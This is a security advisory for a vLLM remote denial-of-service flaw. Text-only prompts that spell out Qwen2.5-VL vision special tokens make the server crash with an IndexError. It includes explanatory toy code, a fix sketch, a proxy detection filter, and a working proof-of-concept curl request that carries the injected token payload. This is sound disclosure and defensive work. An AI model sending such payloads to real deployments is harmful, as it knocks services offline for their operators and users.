vLLM Vulnerable to Remote DoS via Special-Token Placeholders

GHSA-hpv8-x276-m59f · CVE-2026-44222

Published May 5, 2026 · Modified Jun 1, 2026

Description

Summary

This report describes a Token Injection vulnerability in vLLM's multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens rather than as plain text. When image or video placeholder sequences arrive without matching image or video data, vLLM indexes into empty grids during input-position computation and raises an unhandled IndexError, which can terminate the worker or degrade availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.
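
The injection step can be illustrated with a toy encoder. This is a minimal sketch, not vLLM's or Hugging Face's tokenizer: the vocabulary, the token IDs, and the allow_special switch are hypothetical. It only shows how the same user string yields control tokens when special-token spellings are matched in raw text, and none when the text is treated purely as text.

```python
import re

# Hypothetical toy vocabulary; these IDs are illustrative and are NOT the
# real Qwen2.5-VL token IDs.
SPECIAL_TOKENS = {
    "<|vision_start|>": 1001,
    "<|image_pad|>": 1002,
    "<|vision_end|>": 1003,
}
TEXT_ID = 0  # stand-in ID for every ordinary character
_SPECIAL_RE = re.compile("|".join(re.escape(t) for t in SPECIAL_TOKENS))


def encode(text: str, allow_special: bool) -> list[int]:
    """Toy encoder: one TEXT_ID per ordinary character and, only when
    allow_special is True, one control ID per special-token spelling."""
    if not allow_special:
        return [TEXT_ID] * len(text)
    ids: list[int] = []
    pos = 0
    for m in _SPECIAL_RE.finditer(text):
        ids.extend([TEXT_ID] * (m.start() - pos))  # plain text before the match
        ids.append(SPECIAL_TOKENS[m.group()])       # injected control token
        pos = m.end()
    ids.extend([TEXT_ID] * (len(text) - pos))       # trailing plain text
    return ids


def control_ids(ids: list[int]) -> list[int]:
    """Keep only the non-text (control) IDs."""
    return [i for i in ids if i != TEXT_ID]


prompt = "what's in picture <|vision_start|><|image_pad|><|vision_end|>"
print(control_ids(encode(prompt, allow_special=True)))   # [1001, 1002, 1003]
print(control_ids(encode(prompt, allow_special=False)))  # []
```

With allow_special=True, the text-only PoC prompt produces exactly the vision-start, image-placeholder, and vision-end control IDs that the multimodal position code later acts on.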

Details

Affected component: multimodal input position computation.
Files/functions (paths are indicative):
- vllm/model_executor/layers/rotary_embedding.py
  - get_input_positions_tensor(...)
  - _vl_get_input_positions_tensor(...)
Failure mechanism:
- The code counts the detected vision tokens and then indexes video_grid_thw/image_grid_thw once per counted item.
- When user input carries placeholder tokens but no actual multimodal payload, these grids are empty, and the code does not bounds-check before indexing.

Representative snippet (context):

# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )
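
The failure can be reproduced without a GPU or a model by modelling the count-then-index pattern in plain Python. The sketch below is hypothetical: the token IDs are made up, count_vision_items, item_grids, and validate_grids are illustrative names rather than vLLM functions, and it assumes that items are counted from the token that follows each vision-start marker. It shows the unguarded lookup raising IndexError on empty grids, and a bounds check that rejects the request with a descriptive ValueError before any indexing happens.

```python
# Hypothetical token IDs; they are NOT the real Qwen2.5-VL config values.
VISION_START_ID = 1001
IMAGE_TOKEN_ID = 1002
VISION_END_ID = 1003
VIDEO_TOKEN_ID = 1004


def count_vision_items(input_tokens: list[int]) -> tuple[int, int]:
    """Count image and video items by inspecting the token that follows each
    vision-start marker (an assumption about how vision_tokens is built)."""
    image_nums = video_nums = 0
    for i, tok in enumerate(input_tokens[:-1]):
        if tok != VISION_START_ID:
            continue
        nxt = input_tokens[i + 1]
        if nxt == IMAGE_TOKEN_ID:
            image_nums += 1
        elif nxt == VIDEO_TOKEN_ID:
            video_nums += 1
    return image_nums, video_nums


def item_grids(input_tokens, image_grid_thw, video_grid_thw):
    """Unguarded pattern: one (t, h, w) lookup per detected item.
    Raises IndexError when a grid list is shorter than its count."""
    image_nums, video_nums = count_vision_items(input_tokens)
    grids = [tuple(image_grid_thw[i]) for i in range(image_nums)]
    grids += [tuple(video_grid_thw[i]) for i in range(video_nums)]
    return grids


def validate_grids(input_tokens, image_grid_thw, video_grid_thw):
    """Guarded pattern: compare counts with the supplied grids first and
    fail with a descriptive, request-level ValueError instead."""
    image_nums, video_nums = count_vision_items(input_tokens)
    if image_nums != len(image_grid_thw) or video_nums != len(video_grid_thw):
        raise ValueError(
            f"prompt has {image_nums} image / {video_nums} video placeholder(s) "
            f"but {len(image_grid_thw)} image / {len(video_grid_thw)} video "
            "grid(s) were supplied"
        )


# Text tokens followed by an injected image placeholder, with no image data.
tokens = [0, 0, VISION_START_ID, IMAGE_TOKEN_ID, VISION_END_ID]
try:
    item_grids(tokens, [], [])
except IndexError as exc:
    print("unguarded:", type(exc).__name__)  # unguarded: IndexError
try:
    validate_grids(tokens, [], [])
except ValueError as exc:
    print("guarded:", exc)
```

Strict equality (rather than only checking that counts do not exceed the grid lengths) is a design choice in this sketch: it also rejects supplied media that no placeholder refers to. Failing early with a request-level error gives a server the chance to answer that one request with a client error instead of letting the exception escape into the worker.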

Abbreviated call path:

OpenAI API request
 → vllm.v1.engine.core: step/execute_model
 → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
 → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
 → _vl_get_input_positions_tensor
 → IndexError: list index out of range

PoC

Environment

vLLM: 0.10.0
Model: Qwen/Qwen2.5-VL-3B-Instruct
Launch server:

python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000

Request (text-only, no image/video data)

cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json

Observed result

HTTP 500; the logs show IndexError: list index out of range raised from _vl_get_input_positions_tensor(...).
In some deployments the worker exits, and capacity stays reduced until it is manually restarted.

Impact

Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
Scope: Any vLLM deployment that serves vision-language models (VLMs) and accepts raw user text via OpenAI-compatible endpoints, whether self-hosted or behind a proxy or managed front end.
Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
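
Where upgrading is not immediately possible, a front proxy could refuse requests whose text spells out special tokens. This is a hedged stopgap sketch, not the upstream fix: find_special_tokens is a hypothetical helper, the <|name|> pattern assumes Qwen-style special-token spelling (other model families spell special tokens differently), and only the text parts of messages are inspected. The pattern is deliberately broad, so it may also reject legitimate text that happens to contain such strings.

```python
import re
from typing import Any

# Assumption: Qwen-style special tokens are spelled "<|name|>", for example
# "<|vision_start|>" or "<|image_pad|>". Adjust per served model family.
SPECIAL_TOKEN_RE = re.compile(r"<\|[A-Za-z0-9_]+\|>")


def _text_parts(content: Any) -> list[str]:
    """Collect text from OpenAI-style message content, which may be a plain
    string or a list of typed parts such as {"type": "text", "text": ...}."""
    if isinstance(content, str):
        return [content]
    if isinstance(content, list):
        return [
            part["text"]
            for part in content
            if isinstance(part, dict)
            and part.get("type") == "text"
            and isinstance(part.get("text"), str)
        ]
    return []


def find_special_tokens(request: dict[str, Any]) -> list[str]:
    """Return every special-token spelling found in any message's text."""
    hits: list[str] = []
    for message in request.get("messages", []):
        for text in _text_parts(message.get("content")):
            hits.extend(SPECIAL_TOKEN_RE.findall(text))
    return hits


request = {
    "model": "Qwen/Qwen2.5-VL-3B-Instruct",
    "messages": [
        {
            "role": "user",
            "content": [
                {
                    "type": "text",
                    "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>",
                }
            ],
        }
    ],
}
print(find_special_tokens(request))
# ['<|vision_start|>', '<|image_pad|>', '<|vision_end|>']
```

A proxy using this check would reject the PoC request before it reaches vLLM whenever the returned list is non-empty; legitimate image requests, which carry the image as a separate content part rather than as spelled-out tokens, pass through unchanged.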

Fixes

Fixed by the changes associated with https://github.com/vllm-project/vllm/issues/32656.

Credits

Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)
